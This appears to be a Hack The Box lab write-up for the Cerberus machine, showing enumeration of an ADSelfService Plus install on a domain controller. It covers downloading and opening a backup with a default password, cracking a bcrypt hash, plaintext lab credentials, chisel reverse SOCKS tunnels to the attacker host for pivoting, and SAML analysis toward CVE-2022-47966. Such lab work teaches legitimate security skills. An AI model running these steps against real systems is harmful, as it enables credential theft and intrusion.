ADSelfService Plus

upon making a brief assessment regarding the dc host, i came across an interesting installation at the c:\Program Files (x86)\ManageEngine directory

*evil-winrm* ps c:\tmp> dir "C:\Program Files (x86)\"
    directory: C:\Program Files (x86)
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:28 AM                Common Files
d-----        1/17/2024  11:14 AM                Google
d-----         9/7/2022   4:34 AM                Internet Explorer
d-----        1/29/2023  11:12 AM                ManageEngine
d-----        9/15/2018  12:19 AM                Microsoft.NET
d-----        8/24/2021   7:47 AM                Windows Defender
d-----        8/24/2021   7:47 AM                Windows Mail
d-----         9/7/2022   4:34 AM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        8/24/2021   7:47 AM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                WindowsPowerShell
 
 
*evil-winrm* ps c:\tmp> dir "C:\Program Files (x86)\ManageEngine"
    directory: C:\Program Files (x86)\ManageEngine
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/14/2023   6:46 AM                ADSelfService Plus
 
 
*evil-winrm* ps c:\tmp> dir "C:\Program Files (x86)\ManageEngine\ADSelfService Plus"
    directory: C:\Program Files (x86)\ManageEngine\ADSelfService Plus
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/14/2023   6:49 AM                Backup
d-----        1/16/2024  11:00 PM                bin
d-----        1/29/2023  11:15 AM                blog
d-----        2/14/2023   7:55 AM                conf
d-----        1/29/2023  11:18 AM                data
d-----        1/29/2023  11:12 AM                images
d-----        1/29/2023  11:12 AM                jre
d-----         3/1/2023   3:29 AM                lib
d-----        1/29/2023  11:12 AM                licenses
d-----        1/17/2024  11:03 AM                logs
d-----        1/29/2023  11:15 AM                pgsql
d-----        1/29/2023  11:13 AM                resources
d-----        1/29/2023  11:13 AM                Scripts
d-----        1/17/2024   7:00 AM                temp
d-----        1/29/2023  11:13 AM                tools
d-----        1/29/2023  11:13 AM                webapps
d-----        1/29/2023  11:17 AM                work
------       10/21/2022  12:26 AM           4108 COPYRIGHT
-a----        1/29/2023  11:14 AM            227 InjectorInfo.txt
------       10/21/2022  12:26 AM          11981 LICENSE_AGREEMENT
------       10/21/2022  12:26 AM          17165 README.html
-a----        1/29/2023  11:14 AM         120626 unpacklog.txt

and here is the installation of adselfservice plus by ManageEngine

adselfservice plus is an enterprise solution designed to empower end-users with self-service capabilities for tasks related to their Active Directory (AD) accounts. It allows users to reset passwords, unlock accounts, and update personal information without requiring direct IT assistance, thereby reducing the workload on helpdesk personnel.

The tool additionally enhances security through features like multi-factor authentication and ensures policy compliance for effective password management. ADSelfService Plus also provides administrators with real-time notifications, audit logs, and reporting, contributing to streamlined AD management and improved overall organizational security

It explains those 2 unusual ports up and listening

by default, adselfservice plus runs on the port 9251as noted by the official documentation

Additionally, it also uses the port 8888 for web client

Backup

*Evil-WinRM* PS C:\tmp> dir "C:\Program Files (x86)\ManageEngine\ADSelfService Plus\Backup"
    Directory: C:\Program Files (x86)\ManageEngine\ADSelfService Plus\Backup
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/15/2023   7:16 AM         320225 OfflineBackup_20230214064809.ezip
 
*Evil-WinRM* PS C:\Program Files (x86)\ManageEngine\ADSelfService Plus\Backup> download OfflineBackup_20230214064809.ezip
 
Info: Downloading C:\Program Files (x86)\ManageEngine\ADSelfService Plus\Backup\OfflineBackup_20230214064809.ezip to OfflineBackup_20230214064809.ezip
Info: Download successful!

Looking into the backup directory, there is a single ZIP archive I will transfer it to Kali for further analysis

`OfflineBackup_20230214064809.ezip`

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ file OfflineBackup_20230214064809.ezip 
offlinebackup_20230214064809.ezip: 7-zip archive data, version 0.4
 
┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ 7z x OfflineBackup_20230214064809.ezip
 
7-zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
 
scanning the drive for archives:
1 file, 320225 bytes (313 KiB)
 
extracting archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
method = lzma2:3m 7zAES
Solid = +
Blocks = 1
 
    
enter password (will not be echoed):

The OfflineBackup_20230214064809.ezip file is a password-protected 7z archive

Referring to the official documentation, it would appear that the archive was made using the “Offline manual backup” method as it contains the prefix of “OfflineBackup_” Additionally, the backup archive is basically a datadump of the installed instance, containing all the relevant data

Brute-Force Fails

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ 7z2john OfflineBackup_20230214064809.ezip > OfflineBackup_20230214064809.ezip.hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
 
┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ john OfflineBackup_20230214064809.ezip.hash --wordlist=/usr/share/wordlists/rockyou.txt

However, attempting to crack the password fails

Default Password Rule

according to the official documentation, there is a default password rule for archiving, which is the reverse string of the filename.

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ rev <<< 'OfflineBackup_20230214064809'
90846041203202_pukcaBenilffO

I will do just that.

Extraction

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ 7z x OfflineBackup_20230214064809.ezip 
 
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
 
Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)
 
Extracting archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1
 
    
Enter password (will not be echoed): OfflineBackup_20230214064809
Everything is Ok                
 
Files: 979
Size:       2559925
Compressed: 320225

It worked. inflated and there are a total of 975 files came out..

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ cat hash.txt                 
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q
 
┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ cat AaaPassword.txt
601	$2a$12$jwMNhQ6chs7CphGi8Fw8Ku7qyG9gbVYiQswtVRskV8xL/RdQG/2oy	bcrypt	\\xc30c040901022776769ac396f152d24e01225f82e4aa385fa3d4b1934d6bc64c2ab677072a4b9d313575866b97952871b15bb6d871212c563bee00031210547944047202132282da13db02d25bb7dfcd4197726db4601b46438a28b00992	2	3	1675090753256	\N
901	$2a$12$KwGbROsw8B/4izvgrIqLWuZdZNo0spf0CXl0mXIbiqfzLbs5Zfj6m	bcrypt	\\xc30c0409010278d716e4464eacc6d24e01759ea5dd6477aecabcb1ca59874cd222d330acf99c349fb82c6957b057b8d4b06f0e5fd60ab97f7d0a1470ae825bca3aba5ebe78a21a8113ea78fe85929fd1e6dbf977cd46ced4a636b296f59f	2	3	1675091281022	\N
1	$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q	bcrypt	\\xc30c04090102e4e9ad9e9515b069d24e01a00107d43d87ca15343d1671dad0cb23cb8f713e65f5aa5e64a86c13d965e8299ec72fc86374019d48b8dadb1d66ac818c9973623d61fd6b45777931aad69b1318ffc4e2d87e5300be6abb69da	2	3	1676385645256	12

There are these 2 files contains what appears to be UNIX password hashes

┌──(kali㉿kali)-[~/…/htb/labs/cerberus/ADSelfService_Plus]
└─$ hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q:spongebob1
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCY...JPlE9q
Time.Started.....: Wed Jan 17 20:39:07 2024 (41 secs)
Time.Estimated...: Wed Jan 17 20:39:48 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       34 H/s (6.56ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1408/14344386 (0.01%)
Rejected.........: 0/1408 (0.00%)
Restore.Point....: 1344/14344386 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4080-4096
Candidate.Engine.: Device Generator
Candidates.#1....: phoebe -> celticfc
Hardware.Mon.#1..: Util: 81%
 
Started: Wed Jan 17 20:38:33 2024
Stopped: Wed Jan 17 20:39:49 2024

spongebob1 However, I only managed to crack only one of them

Since it’s rather uncertain how relevant this finding is at this point, I will get back to it only if needed. Meantime, I will look for other attack vectors

Version Information

*evil-winrm* ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus> cat README.html | Select-String version
 
            <li>write to the support team any queries/doubts about the software. <a href="http://www.manageengine.com/products/self-service-password/request-support.html?buildNo=6210&versionNo=6.2&RequestSupport" target="_blank">Get Tech
Support.</a></li>
            <li>our product is available at the best possible price in the industry: <a href="http://www.manageengine.com/products/self-service-password/get-quote.html?buildNo=6210&versionNo=6.2" target="_blank">Get a price quote.</a>

Checking the README.html file reveals the version information build 6210 and 6.2

On a sidenote, while searching for version information, I also confirmed that the web client run on the port 8888

Vulnerability

Searching it online for vulnerability reveals an unauthenticated RCE vulnerability; CVE-2022-47966

The target instance is certainly vulnerable as anything before build 6211 is affected

The vulnerability itself is present in the outdated library (Apache Santuario 1.4.1) used by the ADSelfService Plus, and it’s only exploitable if it has been configured with SAML-based SSO at least once.

While the entire database dump at disposal, I could probably go through every single file to search for SAML-based SSO configuration, which will verify the exploitability, but it is not a valuable approach as the individual table usage is not officially documented. So it’s rather the finding-a-niddle-in-the-haysack situation.

So I will use another approach to confirm the presence of SAML-based SSO and further assess the possible endpoints

About SAML and SSO

security assertion markup language (saml) operates as an open standard facilitating the transmission of authorization credentials from identity providers (IdP) to service providers (SP). In essence, this allows for the use of a unified set of credentials for logging into multiple websites. Managing a singular user login proves more straightforward than overseeing distinct logins for email, customer relationship management (CRM) software, Active Directory, and other systems.

saml 2.0 gained approval from the OASIS Consortium in 2005, marking a substantial evolution from SAML 1.1, rendering the two versions incompatible. The adoption of SAML enables IT establishments to leverage software as a service (SaaS) solutions while upholding a robust federated identity management system.

saml enables single-sign on (sso), a term that means users can log in once, and those same credentials can be reused to log into other service providers.

A SAML provider is a system that helps a user access a service they need. There are two primary types of SAML providers, service provider, and identity provider.

A service provider needs the authentication from the identity provider to grant authorization to the user.
An identity provider performs the authentication that the end user is who they say they are and sends that data to the service provider along with the user’s access rights for the service.
microsoft active directory or Azure are common identity providers. Salesforce and other CRM solutions are usually service providers, in that they depend on an identity provider for user authentication.

saml transaction

SAML transactions use Extensible Markup Language (XML) for standardized communications between the identity provider and service providers. SAML is the link between the authentication of a user’s identity and the authorization to use a service.

Step 1 - We try to access some protected resource
Step 2 - The server where that resource resides (Service Provider) doesn’t know us, so it generates a SAML Request to be sent to the Identity Provider. This would be like showing up to Germany without our passport and getting sent back to the US to get our passport before being able to get into the country.
Step 3 - After generating the SAML Request, the SP redirects us to the IdP. Note: The SAML Request passes through our browser on the way to the IdP.
Step 4 - The IdP receives the SAML Request
- Step 4a (not pictured) - The IdP provides some means of authentication; a login form or something similar.
- Step 4b (not pictured) - The IdP validates us as a legitimate user that should be allowed to access the resource included as part of the SAML Request
Step 5 - The IdP creates a SAML Response. The SAML Response contains the SAML Assertions necessary for the SP. The Assertion usually includes the following information at a minimum: Indication that the Assertion is from the correct IdP, a NameID attribute specifying who the user is, and a digital signature. The SAML Response also passes through our browser.
Step 6 - The IdP redirects us to the SP’s Assertion Consumer Service (ACS) URL. The ACS is simply the URL on which the SP expects to receive SAML assertions.
Step 7 - The ACS validates the SAML Response.
Step 8 - We are allowed to access the resource we originally requested.

More about SAMLRequest and SAMLResponse

Pivoting over Tunnel

Since the current WinRM session is running off a reverse socks proxy set on the icinga.cerberus.local host, I would need to make some adjustments in order to access the web client

root@icinga:/dev/shm# ./chiselx64 client 10.10.14.4:55555 R:5985:172.16.22.1:5985&
[1] 222551
2024/01/17 20:14:14 client: Connecting to ws://10.10.14.4:55555
2024/01/17 20:14:14 client: Connected (Latency 27.0954ms)

From the icinga.cerberus.local host, I will cancel out the exiting reverse socks proxy and deploy a single port forwarder essentially tunnelling kali port 5985 to 172.16.22.1:5985 by having the icinga.cerberus.local host forward packets to it

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369            
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\matthew\Documents>

re-establishing the winrm session using the newly created tunnel at 127.0.0.1:5985, which corresponds to 172.16.22.1:5985

*evil-winrm* ps c:\tmp> upload chiselx64.exe
info: Uploading /home/kali/archive/htb/labs/cerberus/chiselx64.exe to C:\tmp\chiselx64.exe
info: Upload successful!
 
*evil-winrm* ps c:\tmp> Start-Job -ScriptBlock { C:\tmp\chiselx64.exe client 10.10.14.4:55555 R:48823:socks }
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
1      job1            backgroundjob   running       true            localhost             c:\tmp\chiselx64.exe ...

Uploading chisel and creating a new reverse socks proxy from the dc.cerberhus.local host over the tunnel, so that I can reach all the services from within the DC host without getting interfered by the active firewall It’s wrapped in the PowerShell Start-Job cmdlet to run in the background, so that I can continue to use the terminal

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ proxychains -q curl http://dc.cerberus.local:8888/ -i
HTTP/1.1 302 Found
cache-control: private
expires: Thu, 01 Jan 1970 00:00:00 GMT
location: https://dc.cerberus.local:9251/
content-length: 0
date: Wed, 17 Jan 2024 20:23:28 GMT

It works!

Verification

Now that I have configured the network to reach the service provided by ADSelfService Plus, I will dive into it

Burp Suite supports SOCKS overhead. I will configure it to match my current SOCKS5 setup at 127.0.0.1:48823 This would allow Burp Suite to intercept the requests normally over its own proxy at 127.0.0.1:8080

Sending a GET request to the web client at the port 8888, the web server redirects to the port 9251 over SSL

Interestingly, it redirects me again to the /showlogin.cc endpoint

The /showLogin.cc endpoints then responses with about 500 lines of JS codes that includes another redirection to an endpoint at /authorization.do

The /authorization.do endpoint then redirects to a very long URL

┌──(kali㉿kali)-[~/…/labs/cerberus/ADSelfService_Plus/CVE-2022-47966]
└─$ echo -e 'https\x3A\x2F\x2Fdc.cerberus.local\x2Fadfs\x2Fls\x2F\x3FSAMLRequest\x3DpVNdb9owFH3fr4j8TuIYGoJFUjFYNSS6RZDuYS\x252BT41xTS4nNbIe2\x252F74OHx2bNiZtT5bsc\x252B8995zj6e1z2wR7MFZqlaE4xCgAxXUt1TZDD\x252BXdIEW3\x252BbupZW1DdnTWuUe1hu8dWBfMrAXjfN1cK9u1YDZg9pLDw3qVoUfndpZG0WJOJ\x252BQmjvoGK72VKkrGLK1jHCcTPMKk5glLxqNRlQqesjFnMeMiTSsiULDwU6Ri7kDt3LDmIQdTgels2GjOmojVwkaNjVCwXGToGwHCkiGrhqJmPBYJF3iIb8ZiWLNK4MnIw6ztYKmsY8pliGAyGuB4EKclTimZUIzDCcFfUVAY7TTXzXupjnp0RlHNrLRUsRYsdZxuZvcrSkJMqyPI0o9lWQyKz5vy0GAvazCfPDpD90yxLXxQXgQIZosNNOKkWFA0nUXBl7MNpLfBG6MsPQp\x252FffTuxBPlR5\x252FoYUET3GnTMne9tr\x252BR9UAcoBSUk\x252B7lp9nXy9k5Ayj\x252Ff8en0SX9\x252FBy6Xr3lotCN5C\x252FBrGn009wAc15RZzpAf10zDuNf1uyU3QGXQkKNorc5p1xDfUi5D7WDZxfMdbtjRtreF3hm3L2pfAmbN16JNYh\x252FUu4qjFPe9\x252FbXhT\x252BetKn7WAL3PEvD\x252FCLauLNwv2OUnx7\x252FsN\x252BP58u\x252Fnb8C\x26RelayState\x3DaHR0cHM6Ly9EQzo5MjUxL3NhbWxMb2dpbi9MT0dJTl9BVVRI'
https://dc.cerberus.local/adfs/ls/?SAMLRequest=pVNdb9owFH3fr4j8TuIYGoJFUjFYNSS6RZDuYS%2BT41xTS4nNbIe2%2F74OHx2bNiZtT5bsc%2B8995zj6e1z2wR7MFZqlaE4xCgAxXUt1TZDD%2BXdIEW3%2BbupZW1DdnTWuUe1hu8dWBfMrAXjfN1cK9u1YDZg9pLDw3qVoUfndpZG0WJOJ%2BQmjvoGK72VKkrGLK1jHCcTPMKk5glLxqNRlQqesjFnMeMiTSsiULDwU6Ri7kDt3LDmIQdTgels2GjOmojVwkaNjVCwXGToGwHCkiGrhqJmPBYJF3iIb8ZiWLNK4MnIw6ztYKmsY8pliGAyGuB4EKclTimZUIzDCcFfUVAY7TTXzXupjnp0RlHNrLRUsRYsdZxuZvcrSkJMqyPI0o9lWQyKz5vy0GAvazCfPDpD90yxLXxQXgQIZosNNOKkWFA0nUXBl7MNpLfBG6MsPQp%2FffTuxBPlR5%2FoYUET3GnTMne9tr%2BR9UAcoBSUk%2B7lp9nXy9k5Ayj%2Ff8en0SX9%2FBy6Xr3lotCN5C%2FBrGn009wAc15RZzpAf10zDuNf1uyU3QGXQkKNorc5p1xDfUi5D7WDZxfMdbtjRtreF3hm3L2pfAmbN16JNYh%2FUu4qjFPe9%2FbXhT%2BetKn7WAL3PEvD%2FCLauLNwv2OUnx7%2FsN%2BP58u%2Fnb8C&RelayState=aHR0cHM6Ly9EQzo5MjUxL3NhbWxMb2dpbi9MT0dJTl9BVVRI

The original string is a combination of URL-encoded characters and escape sequences The decoded output resembles a Single Sign-On (SSO) endpoint as it contains SAML data, evidentially indicated by parameters such as SAMLRequest and RelayState

This confirms that the target ADSelfService Plus instance is indeed configured for SAML-based SSO Given the process is already running, likely under the security context of SYSTEM, exploiting the instance will grant SYSTEM-level privilege

Before jumping into exploiting it, I will further analyze the SAML data

Diving into SAML

there is an excellent burp suite extension to work with saml; saml raider

I will install it

saml raider provides a dedicated tab Refreshing the SSO endpoint reveals the decoded SAML data

now that i have confirmed the function of the saml raider extension, I will attempt to unveil both SAMLRequest and SAMLResponse

samlrequest

<?xml version="1.0" encoding="UTF-8"?>
<saml2p:AuthnRequest AssertionConsumerServiceURL="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f" Destination="https://dc.cerberus.local/adfs/ls/" ID="_8bb47109b07397f1dc8083cb59baeba9" IssueInstant="2024-01-18T14:32:42.073Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" ProviderName="ManageEngine ADSelfService Plus" Version="2.0" xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"><saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f</saml2:Issuer><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextClassRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>

The decoded SAML data is AuthnRequest, containing the AssertionConsumerServiceURL attribute, which identifies where the IdP sends the SAML Response to after authentication. It’s pointing to https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

The 32-byte long hex string is likely GUID, mostly used by AD IdP

Following the redirect for SAMLResponse

SAMLResponse

<?xml version="1.0" encoding="UTF-8"?>
<saml2p:AuthnRequest AssertionConsumerServiceURL="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f" Destination="https://dc.cerberus.local/adfs/ls/" ID="_8bb47109b07397f1dc8083cb59baeba9" IssueInstant="2024-01-18T14:32:42.073Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" ProviderName="ManageEngine ADSelfService Plus" Version="2.0" xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"><saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f</saml2:Issuer><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextClassRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>

While the followed up GET request doesn’t contain much in the SAML data, the interesting bit is in the response from the server

The response from the server contains an embedded HTTP form with both SAMLResponse and RelayState parameters already filled up with base64-encoded SAML data

<samlp:Response ID="_bbf8f7d4-f648-40a2-b680-f4bd9e6753f8" Version="2.0" IssueInstant="2024-01-18T14:35:27.901Z" Destination="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f" Consent="urn:oasis:names:tc:SAML:2.0:consent:unspecified" InResponseTo="_8bb47109b07397f1dc8083cb59baeba9" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"><Issuer xmlns="urn:oasis:names:tc:SAML:2.0:assertion">http://dc.cerberus.local/adfs/services/trust</Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /></samlp:Status><Assertion ID="_bd40b034-66ec-44a7-a891-2cdfb9ebe24f" IssueInstant="2024-01-18T14:35:27.901Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>http://dc.cerberus.local/adfs/services/trust</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256" /><ds:Reference URI="#_bd40b034-66ec-44a7-a891-2cdfb9ebe24f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256" /><ds:DigestValue>T8Bv86m1GNNJzZB/jC4H8r6mIanxODhEnb8E8pCOuh4=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>AykX99f7N42mmuI2FmymPI0MQVcfHGGR0NCpQu6uCAjUQoQpkMA8Ie2SXjbgNwu9lLz32PSfb2vXvvGUuvlRMHNeXTcvPZkmb81WPH77a0x0zkkobdMu3AdMc0biSGH6TuN/xnHgoEopHbpBBQS0WfDE96vwG2dnIbDoyi5mbEfnxd726lvV+MxJlI98gCPtUZhKUciu/iiqBBA4f5CipbApsXF+Hfkio0pxjLnPHX1kF0rEGBsupCAxPNtmpcG64JigJA84ZeuUljx9ve+X8zE0s1TidndSm7+h+u4vlNuAEJ+GkccURv1b/4z4icLwe3O6XYitFTyCBOiBmtL/9A==</ds:SignatureValue><KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>MIIC3jCCAcagAwIBAgIQJJkonjKavJxNAgwJep88RDANBgkqhkiG9w0BAQsFADArMSkwJwYDVQQDEyBBREZTIFNpZ25pbmcgLSBkYy5jZXJiZXJ1cy5sb2NhbDAeFw0yMzAxMzAxNDE4MjJaFw0yNDAxMzAxNDE4MjJaMCsxKTAnBgNVBAMTIEFERlMgU2lnbmluZyAtIGRjLmNlcmJlcnVzLmxvY2FsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5NP7HKKJe5baFkpL2a51DiABmkZJ3PHtEXT6ixuK5PefDFgKAOfFX01fRRu0DROKB7xXDtAZBGLYN2Yd6uELtuDoFtIKFRdGI7gqh34/vbcAxOZJVrNQO01fqEfcAWBMNIK5P/H4qFtAHlIy/kbJ6MfR59bPrSU6bPf+Ql5U5GmxuxkF523i8vGSVHw3H2VwdB8hbZOdWJghm5POCvzonohdvzV9b5SfKcaja0IN7uf46pdBKHnhFNOduZjCNWRQQFkpwDKmMl4xnrauhohwGbIU4D78x219EQ7QP3JPsBPa/hLTWcWGeD1Us8scL7e7jqmBHJG3ghRyU5dnmjhXxQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQDMDps3VUGQN1A8TQcnSR8ZsZyS2NgyvYvAuK6Vi5rgfQxdEbQJcLSLd0SV3EaHVLjj9oddsENEEMOpuBidK/b2rmgKbj/bzUK3A0BPlKvBAx9LrMRwpJMO+De2/gMQTshylu4Q4kdbP1O4eentzCupT41X3LRsc5E0L2P7kxnl4sCtqKstNt5iD+61Xvc57pmWGgNOiJC2KjqsJU8Hv/Z382W6KiEpV69s5d7wS6zaDzgO8RnqzLetn4V8RFs14jVxvuDtKzvN+CUTTb5mxEyNRgYO+5JlB5hSkCZDvn0cmgpYGpeN1v08HspxuhCWzqoT8dwwDwo33zdzsBq5QXYL</ds:X509Certificate></ds:X509Data></KeyInfo></ds:Signature><Subject><SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><SubjectConfirmationData InResponseTo="_8bb47109b07397f1dc8083cb59baeba9" NotOnOrAfter="2024-01-18T14:40:27.901Z" Recipient="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f" /></SubjectConfirmation></Subject><Conditions NotBefore="2024-01-18T14:35:27.901Z" NotOnOrAfter="2024-01-18T15:35:27.901Z"><AudienceRestriction><Audience>https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f</Audience></AudienceRestriction></Conditions><AttributeStatement><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>matthew@cerberus.local</AttributeValue></Attribute></AttributeStatement><AuthnStatement AuthnInstant="2024-01-18T14:33:26.120Z"><AuthnContext><AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</AuthnContextClassRef></AuthnContext></AuthnStatement></Assertion></samlp:Response>

the decoded SAMLResponse reveals a few important things to note;

This is the SAMLResponse to the earlier SAMLRequest;_8bb47109b07397f1dc8083cb59baeba9
the issuer attribute is set to http://dc.cerberus.local/adfs/services/trust
- The issuer attribute identifies the entity that issued the SAML assertion, which is IdP in the current context

Unfortunately, for the mattthew user, the resource is not available

Moving on to [[Cerberus_Privilege_Escalation#[CVE-2022-47966](https //nvd.nist.gov/vuln/detail/cve-2022-47966)|Privilege Escalation]] phase

InfoSec LAB

Explorer

Cerberus_ADSelfService_Plus